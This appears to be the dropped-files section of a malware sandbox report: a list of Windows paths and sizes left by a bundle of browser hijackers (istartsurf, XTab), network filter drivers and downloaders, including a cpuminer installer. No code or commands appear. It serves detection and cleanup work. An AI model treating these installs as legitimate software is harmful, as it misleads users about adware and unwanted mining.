    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
    %Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
    %Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
    C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
    %Program Files% (x86)\WNet\uninst.exe (2792 bytes)
    %Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
    %Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\WNet\WNet.exe (15606 bytes)
    %Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
    %Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)
    %Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
    %Program Files% (x86)\XTab\skin\btn.png (2 bytes)
    %Program Files% (x86)\XTab\install.data (68 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
    %Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
    %Program Files% (x86)\XTab\conf (1626 bytes)
    %Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
    %Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
    %Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\ver.txt (47 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
    %Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
    %Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
    %Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
    %Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
    %Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
    %Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\main.xml (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
    %Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
    %Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
    %Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
    %Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
    %Program Files% (x86)\XTab\web\js\js.js (18 bytes)
    %Program Files% (x86)\XTab\skin\logo.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
    %Program Files% (x86)\XTab\web\main.css (19 bytes)
    %Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
    %Program Files% (x86)\XTab\skin\close.png (3 bytes)
    %Program Files% (x86)\XTab\web\data.html (20 bytes)
    %Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
    %Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
    %Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
    %Program Files% (x86)\XTab\skin\about.png (4 bytes)
    %Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\settings.png (5 bytes)
    %Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
    %Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
    %Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
    %Program Files% (x86)\XTab\web\js\common.js (2 bytes)
    %Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
    %Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
    %Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
    %Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
    %Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
    %Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
    %Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
    %Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
    %Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
    %Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
    %Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
    C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
    %Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
    %Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
    %Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
    %Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
    %Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
    C:\Windows\Temp\P_StoreList.txt (784 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
    C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
    C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
    %Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
    C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
    %Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
    %Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
